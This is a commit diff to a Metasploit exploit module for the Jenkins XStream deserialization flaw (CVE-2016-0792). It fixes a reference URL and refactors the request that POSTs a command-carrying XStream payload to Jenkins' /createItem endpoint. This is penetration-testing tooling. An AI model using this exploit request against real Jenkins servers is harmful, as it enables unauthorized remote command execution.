Add get_vars, remove a https instance

Author: attackdebris

modules/exploits/multi/http/jenkins_xstream_deserialize.rb

@@ -29,7 +29,7 @@ def initialize(info = {})
       'References'     =>
           [
             ['CVE', '2016-0792'],
-            ['URL', 'https://https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
+            ['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
             ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413']
           ],
         'Platform'  => %w{ win linux unix },
@@ -105,10 +105,13 @@ def execute_command(cmd, opts = {})
     cmd.map! { |arg| arg.encode(xml: :text) }
 
     res = send_request_cgi(
-      'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, '/createItem?name=random'),
-      'ctype'  => 'application/xml',
-      'data'   => xstream_payload(cmd)
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/createItem'),
+      'vars_get' => {
+              'name' => 'random'
+      },
+      'ctype'    => 'application/xml',
+      'data'     => xstream_payload(cmd)
     )
   end